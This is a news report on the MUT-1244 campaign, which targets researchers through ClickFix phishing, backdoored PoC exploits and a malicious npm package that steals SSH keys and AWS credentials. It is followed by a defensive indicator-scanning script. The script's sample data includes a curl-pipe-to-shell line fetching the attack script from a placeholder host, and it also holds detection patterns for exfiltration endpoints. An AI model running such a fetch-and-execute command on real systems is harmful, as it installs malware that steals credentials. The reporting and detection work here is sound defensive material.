MUT-1244 targeting security researchers, red teamers, and threat actors
A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data.
MUT-1244 has been using phishing emails, the ClickFix tactic, and GitHub repositories with bogus proof-of-concept (PoC) exploits or copies of legitimate, working exploits that have been backdoored or include a malicious npm package.
But they’ve also been somewhat careless, allowing DataDog and Checkmarx researchers to make connections and trace their activities.
A broad and long-running campaign
MUT-1244’s ultimate goal is to deliver xmrdropper – a payload that updates a cryptocurrency miner but also backdoors systems and “exfiltrates system information, private SSH keys, environment variables, and the content of select folders (such as ~/.aws) to the file sharing service file[.]io.”
To do that, they’ve scraped email addresses from research papers published on the arXiv open-access archive and – from October 5 to October 21, 2024 – sent out a phishing email nudging academics and researchers to install a CPU microcode update by copying and pasting a piece of code into their system’s terminal.
The phishing webpage instructing victims to install the CPU update (Source: DataDog)
“To our knowledge, this is the first documented ‘ClickFix’-type attack that targets Linux systems. When the victim executes the malicious command, the script patch-mc-0x129.sh from the GitHub repository opencompiled-oss/kernel-patch is executed,” DataDog researchers Christophe Tafani-Dereeper, Adrian Korn and Matt Muir explained.
The script drops the xmrdropper, from https://codeberg[.]org/k0rn66/xmrdropper.
Simultaneously, they’ve also been targeting security researchers and offensive actors by setting up dozens of malicious GitHub repositories with fake and/or trojanized PoC exploit code that resulted in the download and execution of the xmrdropper.
Finally, they’ve also set up a trojanized GitHub project (hpc20235/yawpp) that offered a tool for checking the validity of WordPress credentials, but required users to also install the @0xengine/xmlrpc npm package as a dependency. The package would drop the xmrdropper, as well as exfiltrate sensitive files to Dropbox.
Multi-pronged attack campaign (Source: DataDog)
According to Checkmarx researchers, the combination of regular updates, seemingly legitimate functionality, and strategic dependency placement has contributed to the @0xengine/xmlrpc package being hosted on the NPM registry (and not flagged as malicious!) since October 2023.
“The malware steals sensitive data (SSH keys, bash history, etc.) every 12 hours while mining cryptocurrency on infected systems,” they shared in late November 2024. “At the time of investigation, it appeared that up to 68 compromised systems were actively mining cryptocurrency through the attacker’s Monero wallet.”
“Hundreds of victims of MUT-1244 were and are still being compromised,” DataDog researchers warned on Friday.
Both companies have shared indicators of compromise to help potential victims check whether they’ve been compromised.
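A defender-side triage check written for this article (an added example, not code from DataDog or Checkmarx): it flags package.json manifests that declare the @0xengine/xmlrpc dependency and scans shell-history or log lines for the repository, script and file.io names quoted above. The sample manifest and history lines are constructed, and the URL host in the sample is a placeholder.

```python
import json
import re
from pathlib import Path

# Indicators named in the DataDog/Checkmarx reporting on MUT-1244, as quoted in the article.
MALICIOUS_NPM_PACKAGE = "@0xengine/xmlrpc"
SUSPICIOUS_PATTERNS = [
    re.compile(r"codeberg\.org/k0rn66/xmrdropper", re.I),   # xmrdropper payload host
    re.compile(r"opencompiled-oss/kernel-patch", re.I),     # repo behind the ClickFix "microcode update"
    re.compile(r"patch-mc-0x129\.sh", re.I),                # script executed by the ClickFix command
    re.compile(r"https?://file\.io/", re.I),                # exfiltration destination
]

def find_malicious_dependency(package_json_text: str) -> list[str]:
    """Return the dependency sections of a package.json that pull in @0xengine/xmlrpc."""
    try:
        manifest = json.loads(package_json_text)
    except json.JSONDecodeError:
        return []  # not a manifest we can parse; nothing to report
    hits = []
    for section in ("dependencies", "devDependencies", "optionalDependencies", "peerDependencies"):
        deps = manifest.get(section, {})
        if isinstance(deps, dict) and MALICIOUS_NPM_PACKAGE in deps:
            hits.append(f"{section}: {MALICIOUS_NPM_PACKAGE}@{deps[MALICIOUS_NPM_PACKAGE]}")
    return hits

def scan_text_lines(lines) -> list[tuple[int, str]]:
    """Return (line_number, line) for history/log entries matching a MUT-1244 indicator."""
    return [(n, line.rstrip()) for n, line in enumerate(lines, 1)
            if any(p.search(line) for p in SUSPICIOUS_PATTERNS)]

def scan_tree(root: Path) -> dict:
    """Walk a checkout or node_modules tree and flag every manifest that depends on the package."""
    findings = {}
    for manifest in root.rglob("package.json"):
        hits = find_malicious_dependency(manifest.read_text(errors="replace"))
        if hits:
            findings[str(manifest)] = hits
    return findings

# Constructed sample input (not a real capture); version and host are placeholders.
SAMPLE_MANIFEST = json.dumps({"name": "wp-checker", "dependencies": {"axios": "^1.6.0", "@0xengine/xmlrpc": "^1.0.0"}})
SAMPLE_HISTORY = [
    "ls -la",
    "curl -s https://example.invalid/opencompiled-oss/kernel-patch/patch-mc-0x129.sh | sh",
    "git status",
]

if __name__ == "__main__":
    print(find_malicious_dependency(SAMPLE_MANIFEST), scan_text_lines(SAMPLE_HISTORY))
```

Run scan_tree over a cloned PoC repository or a project's node_modules, and scan_text_lines over ~/.bash_history or proxy logs, to triage a host before pulling the full indicator lists from the two reports.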